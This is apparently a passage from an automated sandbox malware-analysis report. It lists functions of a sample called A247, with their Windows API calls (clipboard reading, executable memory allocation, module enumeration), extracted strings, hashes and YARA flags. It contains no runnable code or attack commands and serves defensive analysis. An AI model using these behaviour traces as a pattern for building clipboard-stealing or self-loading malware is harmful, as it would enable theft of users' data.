API String ID: 2039140958-3809124531
Opcode ID: cbbe94e1d607de42a8e897c5ed6c7dfebdb6e6a87b75144c6ad5122602fa5c3d
Instruction ID: 1368c0940c647f4f39a91e564e44146e6a68535283266bc39cb5798660f285bc
Opcode Fuzzy Hash: cbbe94e1d607de42a8e897c5ed6c7dfebdb6e6a87b75144c6ad5122602fa5c3d
Instruction Fuzzy Hash: 44F06575294701B7E718DF10EC56F1A32E0EB81B44F10482DB245AA1D0D7F5AA19DA5E

Function 0042B5E8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0042B73B

Strings

*, xrefs: 0042B636
,, xrefs: 0042B676

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID: AllocString
String ID: *$,
API String ID: 2525500382-162240353
Opcode ID: 6f887dd92c1e7d051b441eb50b8ce683dfa68637c71dffcb6e4b95598e80c62e
Instruction ID: 8755544d7d26afcd6c5da590c34bf048d679cfec69adbb61e5b4e032c319a10d
Opcode Fuzzy Hash: 6f887dd92c1e7d051b441eb50b8ce683dfa68637c71dffcb6e4b95598e80c62e
Instruction Fuzzy Hash: 2641C27450D7C18ED371CB28845C78BBFE0AB9A324F148A4DE0E94B2E2CB74510ADB97

Function 004283B9 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 386COMMON

Download Yara Rule

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042893E

Strings

sflQ, xrefs: 0042882B

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: sflQ
API String ID: 3960555810-3249545781
Opcode ID: 8302543d336a64d61fbfd091ffaf374d6ea3bc29c3405159477e15a25cf067dc
Instruction ID: ceaf3b536834eb6ea101402e43ebfa27eafed5b2e0152b17aac62569a04a8eaf
Opcode Fuzzy Hash: 8302543d336a64d61fbfd091ffaf374d6ea3bc29c3405159477e15a25cf067dc
Instruction Fuzzy Hash: 42E16F70205B918AD7258F39C4A47E7BBE1BF16305F98499EC0EB8B382DB396409CB55

Function 0042880F Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 322COMMON

Download Yara Rule

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042893E

Strings

sflQ, xrefs: 0042882B

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: sflQ
API String ID: 3960555810-3249545781
Opcode ID: eda0b82203ec5fd52a02e42ad8bc985fa3b6130ce1cc9c57a209a743f85e5ba8
Instruction ID: 4579460111167dd6f514478598ab714a340966e7b3f1678d87b811800d9ff980
Opcode Fuzzy Hash: eda0b82203ec5fd52a02e42ad8bc985fa3b6130ce1cc9c57a209a743f85e5ba8
Instruction Fuzzy Hash: A7C17F70205B918AD725CF35C4A07E7BBE1BF16304F98495ED0EB8B382DB796409CB55

Function 0043551D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000), ref: 004355C8

Strings

\-"#, xrefs: 00435578

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID: FreeHeap
String ID: \-"#
API String ID: 3298025750-2514456039
Opcode ID: 859eba75cc14126060daa5553d4e99eea4a1c63d27fd1e683f7c5ac40af54193
Instruction ID: 4e5805d71c6b113a9038e1d4705d07e5b3b04c5f079926af7e5af699945cb8d6
Opcode Fuzzy Hash: 859eba75cc14126060daa5553d4e99eea4a1c63d27fd1e683f7c5ac40af54193
Instruction Fuzzy Hash: 5A1151716083019FD708CF50D8A475FFBE2FBC4328F148A1DE4A917691C3B99909CB86

Function 00414EC0 Relevance: 3.2, APIs: 2, Instructions: 181COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00414EFA
RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00414F28

Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID: EnvironmentExpandStrings$AllocateHeap
String ID:
API String ID: 3432729115-0
Opcode ID: 9a53a9201fbbf031bf3ec0bbcf05d332dbfb10e1ddfa8b4e88992b5ce484714e
Instruction ID: 3bef7b545c1fe862b70271ecfb8295d17d8257d1e606da934cadffb5b9659bed
Opcode Fuzzy Hash: 9a53a9201fbbf031bf3ec0bbcf05d332dbfb10e1ddfa8b4e88992b5ce484714e
Instruction Fuzzy Hash: C351E0B41043018BD324CF14C891BABBBE5FFC5718F048A1DF9A69B391EB789941CB96

Function 00417A30 Relevance: 3.1, APIs: 2, Instructions: 64COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00417A6A
RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00417A98

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 068419ec1a366db8bddaf31dae3676283e5c1e8fd397c4a83bf892c92bc97e90
Instruction ID: 9d185849e125c65ed9e76077d369fe8678050950fd45e526c791e55ee9a7ec59
Opcode Fuzzy Hash: 068419ec1a366db8bddaf31dae3676283e5c1e8fd397c4a83bf892c92bc97e90
Instruction Fuzzy Hash: 0F01D2755482047FD310AB25CC86F67776CEB86764F044619F9668B2D1EB30A908C6B6

Function 008AE17E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008AE1A6
Module32First.KERNEL32(00000000,00000224), ref: 008AE1C6

Memory Dump Source

Source File: 00000005.00000002.2871870285.00000000008AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8ad000_A247.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 9963ef42b60db961d48662e4283cdd045ee56fb49f5fbde5f77079ff6f819ba5
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: BBF062322007246BF7202AB9988DA6A76ECFF4A725F100928E642D18C0DA74EC458A61

Function 00610E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00610223,?,?), ref: 00610E19
SetErrorMode.KERNELBASE(00000000,?,?,00610223,?,?), ref: 00610E1E

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 649faff877baa90af5d0f76c5993c87f03ba0bdede3cca897dfd7d7f314a1141
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: FFD0123114512877DB002A95DC09BCD7B1CDF05B62F048411FB0DD9180C7B0998046E5

Function 00436D86 Relevance: 1.6, APIs: 1, Instructions: 67libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE ref: 00436E70

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: dc9adec9b8184aaf73981e838b522b6d47d30a6e16419426b755bca3264c8062
Instruction ID: 50cfc2c49a3083e08c64fd866987bc454676edab02516c1ee8da21e686402dde
Opcode Fuzzy Hash: dc9adec9b8184aaf73981e838b522b6d47d30a6e16419426b755bca3264c8062
Instruction Fuzzy Hash: 4821D2B4501A02AFE715DF25D8D1A2ABBB2FB86305F10C23EC85647B15DB38A455CFD8

Function 0043724D Relevance: 1.6, APIs: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(00000000,00000000), ref: 004372ED

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ad23319594c346ecf424d56c5213ed755dd05cb4f309e994e67b51aad4c8c90e
Instruction ID: d108b6c160ddb040137915c382c094585e6d719fb6ca8c5299172bcdf25914e1
Opcode Fuzzy Hash: ad23319594c346ecf424d56c5213ed755dd05cb4f309e994e67b51aad4c8c90e
Instruction Fuzzy Hash: 131113751083409FD700CF04D49470BB7A2EFC5318F65CA5CE8A81B25AC379A90ACB9A

Function 004372F8 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0043738D

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8b4b31e72015f58f2354e1bb9d9c3a9735f796f91b91e2fab4406d122cedec8b
Instruction ID: ee8488e267e88be69cd1f03818601e052f7114df8572ecc488c32b2c78a41869
Opcode Fuzzy Hash: 8b4b31e72015f58f2354e1bb9d9c3a9735f796f91b91e2fab4406d122cedec8b
Instruction Fuzzy Hash: 6F11E87010C3409FD718CF14D46476FBBE1EFC5718F148A1DE8AA1B692C379991ACB8A

Function 00435440 Relevance: 1.5, APIs: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 79dca1b32247aa9b70ad2c1bcd7dcd008df1434939f9a33d85ef6ce44ca53825
Instruction ID: 3dda7e75f36cf504926de81a89fda72ed932754256e5c243a5fe3c5ff6ff8171
Opcode Fuzzy Hash: 79dca1b32247aa9b70ad2c1bcd7dcd008df1434939f9a33d85ef6ce44ca53825
Instruction Fuzzy Hash: 731125705083009FD708CF10C46476BBBA1EB85328F108A1DE8A917681C379DA09CBC6

Function 004373E0 Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043A22C,005C003F,00000006,00120089,?,00000018,' !",00000000,004150CA), ref: 00437406

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82

Function 008ADE3D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008ADE8E

Memory Dump Source

Source File: 00000005.00000002.2871870285.00000000008AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8ad000_A247.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 7099a1066f162bdb285c8b7117639e11bc43c2fd1b9ce89528bbbf777198893b
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: C2113C79A00208EFDB01DF98C985E99BBF5EF08351F058094FA489B362D371EA50DF90

Non-executed Functions

Function 0042EAB0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 127clipboardCOMMON

Download Yara Rule

APIs

GetWindowInfo.USER32 ref: 0042EAD8
OpenClipboard.USER32 ref: 0042EAEA
GetClipboardData.USER32 ref: 0042EB03
GlobalLock.KERNEL32 ref: 0042EB28
GlobalUnlock.KERNEL32 ref: 0042EC59
CloseClipboard.USER32 ref: 0042EC68

Strings

@, xrefs: 0042EBA2
A, xrefs: 0042EB93
C, xrefs: 0042EBA7
F, xrefs: 0042EBAC

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID: Clipboard$Global$CloseDataInfoLockOpenUnlockWindow
String ID: @$A$C$F
API String ID: 3829817484-319984173
Opcode ID: 8ad0d9297b1ef162b2248c3ebd06f01706d8c7b0091a801e9c92d9469685e51b
Instruction ID: 15be754739b74540689589334df2f87df7105b9426ed1557cb94c4d1065241c1
Opcode Fuzzy Hash: 8ad0d9297b1ef162b2248c3ebd06f01706d8c7b0091a801e9c92d9469685e51b
Instruction Fuzzy Hash: 9B513D7060C391CFD300DF6AA48875FBFE0AB96364F940A6EF4D58A291C738954A8B57

Function 00417062 Relevance: 10.3, Strings: 8, Instructions: 344COMMON

Download Yara Rule

Strings

I-@3, xrefs: 00417072
-E>K, xrefs: 0041709C
[)M/, xrefs: 0041706B
!I$O, xrefs: 004170A3
*M*S, xrefs: 004170AA
L9_?, xrefs: 00417087
W=WC, xrefs: 0041708E
B5E;, xrefs: 00417080

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID:
String ID: !I$O$*M*S$-E>K$B5E;$I-@3$L9_?$W=WC$[)M/
API String ID: 0-4068174152
Opcode ID: 26436c3c5eaa3c87bf30491f8fb8102a7c5f323278362c9e03f2b8f6bc4fdb47
Instruction ID: c5e2fc403fb0cec226c3ddd8a9dc625652c1aa2ba632ddc363c6cf4a8812eb13
Opcode Fuzzy Hash: 26436c3c5eaa3c87bf30491f8fb8102a7c5f323278362c9e03f2b8f6bc4fdb47
Instruction Fuzzy Hash: CBC1AAB1104B018BD328CF14C5A1B63B7B2FF56318F28865DC8A64BB91E779F891CB94

Function 006272C9 Relevance: 10.3, Strings: 8, Instructions: 344COMMON

Download Yara Rule

Strings

L9_?, xrefs: 006272EE
-E>K, xrefs: 00627303
W=WC, xrefs: 006272F5
B5E;, xrefs: 006272E7
!I$O, xrefs: 0062730A
I-@3, xrefs: 006272D9
*M*S, xrefs: 00627311
[)M/, xrefs: 006272D2

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID: !I$O$*M*S$-E>K$B5E;$I-@3$L9_?$W=WC$[)M/
API String ID: 0-4068174152
Opcode ID: fff0af72006f123bcc6fc661a3252df57c55cfd64bb4fe08b2f90c9271b5dd27
Instruction ID: 65778afa773b6ec2d6894a4dfe5a3db82036b746176525000e72b8c569464f8b
Opcode Fuzzy Hash: fff0af72006f123bcc6fc661a3252df57c55cfd64bb4fe08b2f90c9271b5dd27
Instruction Fuzzy Hash: BEC188B1504B128BD728CF14C4A1B62B7F2FF56318F188A5CC8A68BB91E775F851CB94

Function 004223B8 Relevance: 9.3, Strings: 7, Instructions: 552COMMON

Download Yara Rule

Strings

", xrefs: 004226F2
P%B, xrefs: 00422940
b%B, xrefs: 00422555
B(B, xrefs: 004227C9
5Q, xrefs: 0042245D
"(B, xrefs: 004227C3
0, xrefs: 0042263F

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID: AllocateHeap
String ID: "$"(B$0$5Q$B(B$P%B$b%B
API String ID: 1279760036-2560538612
Opcode ID: d47fa415301365560c3d99d206a890aaa13eccf696f161fa7df0d9d55ca40e3c
Instruction ID: ae90b01d8c300a32a6ec655623065aa85ae112dbe4b9f4c81515b6d4964649e2
Opcode Fuzzy Hash: d47fa415301365560c3d99d206a890aaa13eccf696f161fa7df0d9d55ca40e3c
Instruction Fuzzy Hash: 851266316083909FD324CF28D85076ABBE2AFC6324F59866EE4958B3E1C779CD45CB46

Function 00619BC7 Relevance: 6.7, Strings: 5, Instructions: 472COMMON

Download Yara Rule

Strings

ZR\;, xrefs: 00619E6F
01, xrefs: 0061A1AD
[hct, xrefs: 00619EAD
0, xrefs: 00619C3D
{hmn, xrefs: 00619EB5

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID: 0$01$ZR\;$[hct${hmn
API String ID: 0-1484469362
Opcode ID: 46fbbb30a144e6cdf2b1d370ae05e1a5de9fab85d772feda1479b6a92d328fba
Instruction ID: 83fb3340241630d5a4d2858ff90b63b3743d94bc46c9b4e4249487b90e44dc48
Opcode Fuzzy Hash: 46fbbb30a144e6cdf2b1d370ae05e1a5de9fab85d772feda1479b6a92d328fba
Instruction Fuzzy Hash: BB1203B01083818BE324CF54D4A4BAFBBF2BB86348F144D1DE5D58B291D77AD849CB96

Function 00423C97 Relevance: 6.6, APIs: 4, Instructions: 619COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,00000000,?), ref: 00423D8D
RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,?,?), ref: 00423DB6
RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,00000000,?), ref: 004241CD
RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,?,?), ref: 004241FB

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: d4d6b6a8b49c0bb25a3653efa362111b955856ebe702b21ad3d56c6c9453a05c
Instruction ID: e81b59cdcbc34e311b7fbd4a7f811c95e6a6bbd50fbc0b950e223fe6d83b0846
Opcode Fuzzy Hash: d4d6b6a8b49c0bb25a3653efa362111b955856ebe702b21ad3d56c6c9453a05c
Instruction Fuzzy Hash: 6D3257B4600B009FD728CF29C495B17BBB2FB85314F158A5DE8A64BB89D774E809CBD1

Function 00633EFE Relevance: 6.6, APIs: 4, Instructions: 619COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,DF3FD14C), ref: 00633FF4
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,DF3FD14C), ref: 0063401D
RtlExpandEnvironmentStrings.NTDLL(00000000,2FDE2DC1,00000009,00000000,00000000,?), ref: 00634434
RtlExpandEnvironmentStrings.NTDLL(00000000,2FDE2DC1,00000009,00000000,?,?), ref: 00634462

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 6721b5089de62f2581515a1f3700886ae7ab926132f011bbbe8c8f6fc0b297ab
Instruction ID: c6a3f27564355fe31be10dfcad74375a9dc0c46028ffee080900202718ed33ba
Opcode Fuzzy Hash: 6721b5089de62f2581515a1f3700886ae7ab926132f011bbbe8c8f6fc0b297ab
Instruction Fuzzy Hash: B13247B4500B009FD728CF29C495B17BBB2FB85314F158A5CE8A64BB99D774E80ACBD1

Function 00633ECF Relevance: 6.6, APIs: 4, Instructions: 614COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,DF3FD14C), ref: 00633FF4
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,DF3FD14C), ref: 0063401D

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 217409ddc3c94f618525d253030682f72d4f3ca85dca1c4465c4694fb7a70ead
Instruction ID: 9910c407b673fdbed999ffee68aa6861d8d16ce6c62898a5a0ae9a15533ac20c
Opcode Fuzzy Hash: 217409ddc3c94f618525d253030682f72d4f3ca85dca1c4465c4694fb7a70ead
Instruction Fuzzy Hash: BE3246B4500B009FD728CF28C495B17BBB2FB85314F158A5CD8A64BB9AD774E80ACBD1

Function 00421C71 Relevance: 5.4, Strings: 4, Instructions: 369COMMON

Download Yara Rule

Strings

2 B, xrefs: 00422024
J>;0, xrefs: 00421D32
/V.W, xrefs: 00421D42
gdeb, xrefs: 004220CE

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID: AllocateHeap
String ID: /V.W$2 B$J>;0$gdeb
API String ID: 1279760036-1943473526
Opcode ID: b677bb330bcbed95735b484cae22a33eb07d18e121d84d5491ef0f7b04aa1ca3
Instruction ID: 1f1b32295078fd643b98cacce706d452a3674876845b3b7fea61ac9470719d4c
Opcode Fuzzy Hash: b677bb330bcbed95735b484cae22a33eb07d18e121d84d5491ef0f7b04aa1ca3
Instruction Fuzzy Hash: A1D18AB56083518FC724CF28D89072BBBE1BFCA314F954A6DE89987391D774E901CB86

Function 00631C89 Relevance: 5.1, Strings: 4, Instructions: 126COMMON

Download Yara Rule

Strings

.A+C, xrefs: 00631C99
<Y9[, xrefs: 00631D35
de, xrefs: 00631CD5
#M*O, xrefs: 00631CA1

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID: #M*O$.A+C$<Y9[$de
API String ID: 0-619215113
Opcode ID: 511338df0e01b7e020f68d2e2ffe54247379295d5db2bf8c1464e1bb9d8b3272
Instruction ID: 0e6d1f3f5f166675704642584e9ce8b63bafccb63b03edfbfbc58274c5b42cdf
Opcode Fuzzy Hash: 511338df0e01b7e020f68d2e2ffe54247379295d5db2bf8c1464e1bb9d8b3272
Instruction Fuzzy Hash: 9A4156716083958BC728CF04C4907ABB7F2FF86314F415A1CE8965B790E7B99806CB86

Function 006375BA Relevance: 4.9, Strings: 3, Instructions: 1198COMMON

Download Yara Rule

Strings

]hW9, xrefs: 00638392
2PBb, xrefs: 0063852C
Yceh, xrefs: 00638388

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID: 2PBb$Yceh$]hW9
API String ID: 0-1551782443
Opcode ID: 734dabc05ea60f004194020b556aab606ea901bc42e275c09313137895361325
Instruction ID: 1ac7f7b0bc6247abdd6e2c3a1cfcee4dc7e8a5374023f179da33342ecec451e9
Opcode Fuzzy Hash: 734dabc05ea60f004194020b556aab606ea901bc42e275c09313137895361325
Instruction Fuzzy Hash: E9924B70104B808EE7368F35C4A17E7BBE2BF16305F48499CD1EB8B282DB79650ACB55

Function 00425CEE Relevance: 4.5, Strings: 3, Instructions: 795COMMON

Download Yara Rule

Strings

JlRp, xrefs: 004265C0
7452, xrefs: 004269C1
7452, xrefs: 004268BC

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID: InitializeThunk
String ID: 7452$7452$JlRp
API String ID: 2994545307-3284767125
Opcode ID: 92cc4ae05945aba4e668405ce1423f3846cc19dc5b7ecfea896f74c89be008a8
Instruction ID: e650c655e12bce7b67b4aee498b20d7031e1d261d0f6e781b1df18e503fb0051
Opcode Fuzzy Hash: 92cc4ae05945aba4e668405ce1423f3846cc19dc5b7ecfea896f74c89be008a8
Instruction Fuzzy Hash: 5F52AC70205B908BE325CF29D5907A3BBE2BF56304F948A5EC4DB8B785C739B409CB59

Function 00635F55 Relevance: 4.5, Strings: 3, Instructions: 795COMMON

Download Yara Rule

Strings

JlRp, xrefs: 00636827
7452, xrefs: 00636C28
7452, xrefs: 00636B23

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID: 7452$7452$JlRp
API String ID: 0-3284767125
